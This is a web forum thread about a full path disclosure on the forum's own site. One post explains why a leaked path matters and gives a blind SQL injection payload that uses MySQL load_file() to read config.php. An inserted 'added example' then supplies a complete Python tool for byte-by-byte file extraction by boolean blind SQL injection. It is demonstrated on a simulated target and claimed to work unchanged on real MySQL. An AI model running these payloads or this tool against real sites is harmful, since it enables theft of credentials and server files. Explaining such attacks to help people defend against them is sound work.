Topic: "full path disclosure." (page 2 of 2)

Element
Yeah, same here
occasus
I agree with the others (javey, Element...), and you, Eric, say explicitly that we won't get access in any case... so? Where is the problem?
unknown user
Just in case some of you don't understand the term "full path disclosure":

Allow me to explain what it is. Data is stored in files, and these "files" are organized into directories (collections of files, or of other directories).
When a file is in a directory in a directory in a directory, the names of the directories are joined together into a "path",
e.g. c:\windows\system32\etc\hosts

but you can also have relative paths, for example etc\hosts if the current directory is c:\windows\system32.

We all know relative paths on the webserver, for example forum/forum_newpost.php
(yeah, these could be virtual, due to mod_rewrite, but let us assume they are not).

Now the website disclosed the full path because of some error messages, which pinpointed what file was causing the error.


SO? This is like so boring, I don't understand why anybody would care to know this.

You would be largely correct: this information is not dynamite. (Else I wouldn't have put it on a public forum.)

However, it is NOT worthless. There are several attack vectors which depend on the fact that you know absolute paths.
One of the most obvious ones is the load_file() function of MySQL.
Even though we assume that erik/tbs/... configured MySQL correctly, there is the possibility they didn't. And then, with
a simple blind SQL injection (SQL injections easily sneak into a website like this, and they have at least once before, when upgrades were done to the forum),
instead of selecting data from tables whose names you have to guess, you could do
' and 97 = (select ascii(substring(load_file('/path/to/website/..../config.php'),x,1)))
and this would allow you to read useful files from the disk through a simple blind SQL injection.
This situation is not uncommon.

There are other vectors which also benefit from the knowledge of these paths.

So in conclusion, it's a pretty "lame" thing, this full path disclosure, and you now know all about it that is worth knowing.
The only thing I have not told you is the "actual" full path. I have done this for several reasons:
- It was already filtered by an admin
- I gain nothing by telling it again
- I actually don't have it stored on this computer.


That's about all I have to say about this. I didn't want to irritate anybody; this is somewhat of a non-event.
However, I'm sure this info is also in tbs's tutorial on web vulnerabilities. If it is, don't forget to ack me when you add it.
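The blind load_file() extraction described in the post above, worked through as an added example (this is not code from the post or from the forum software). The forum page, its posts table and the path /var/www/html/config.php are invented for the demo, and the database is an in-process sqlite3 stand-in with ascii() and load_file() registered to mimic the MySQL behaviour the attack relies on: ascii('') is 0 once the position runs past the end of the file, and load_file() returns NULL (so every comparison is false) when the file is unreadable or the database user lacks the FILE privilege, which is exactly the "configured MySQL correctly" case the post hedges on.

```python
"""Boolean-based blind SQL injection that reads a file byte by byte via
load_file().  Added example; target and filesystem are simulated so it
runs offline.  Hypothetical names: the 'posts' table, the known title
'Welcome' and the path /var/www/html/config.php."""
import sqlite3
from typing import Callable, Optional

# Constructed stand-in for the filesystem the database server can read.
FAKE_FS = {"/var/www/html/config.php": "<?php $dbpass = 's3cret';\n"}


class VulnerableForum:
    """Simulated forum page: looks a post up by title and builds the SQL
    with string concatenation, which is the injection point."""

    def __init__(self, file_priv: bool = True) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("create table posts (title text, body text)")
        self.db.execute("insert into posts values ('Welcome', 'hello')")
        # MySQL semantics: ascii(NULL) -> NULL, ascii('') -> 0, ascii('a') -> 97
        self.db.create_function(
            "ascii", 1, lambda s: None if s is None else (ord(s[0]) if s else 0))
        # load_file() -> NULL unless the user has FILE and the file is readable
        self.db.create_function(
            "load_file", 1, lambda p: FAKE_FS.get(p) if file_priv else None)

    def page_shows_post(self, title: str) -> bool:
        sql = f"select body from posts where title = '{title}'"  # vulnerable
        return self.db.execute(sql).fetchone() is not None


def payload(known_title: str, path: str, pos: int, op: str, value: int) -> str:
    """Attacker-controlled title; whether the page renders now hinges on
    one byte of the file.  substr() works in both MySQL and SQLite."""
    return (f"{known_title}' and {value} {op} "
            f"(select ascii(substr(load_file('{path}'),{pos},1)))-- -")


def extract_file(oracle: Callable[[str], bool], path: str,
                 known_title: str = "Welcome", max_len: int = 4096) -> Optional[str]:
    """Recover the file with a binary search per position (8 requests a
    byte).  Returns None when load_file() yields NULL, i.e. no FILE
    privilege, secure_file_priv in the way, or no such file."""
    if not oracle(f"{known_title}' and load_file('{path}') is not null-- -"):
        return None
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(payload(known_title, path, pos, "<", mid)):  # mid < byte?
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # ascii('') == 0: ran past the end of the file
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    target = VulnerableForum(file_priv=True)
    print(extract_file(target.page_shows_post, "/var/www/html/config.php"))
    locked = VulnerableForum(file_priv=False)
    print(extract_file(locked.page_shows_post, "/var/www/html/config.php"))
```

The first run prints the simulated config.php; the second, against a database user without FILE, prints None, which is the only thing separating a disclosed path from a disclosed file. Against a real MySQL target the same payloads work unchanged, at roughly eight requests per byte.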
occasus
Thanks rhican for the nice explanation... Some things have been cleared up in my mind :)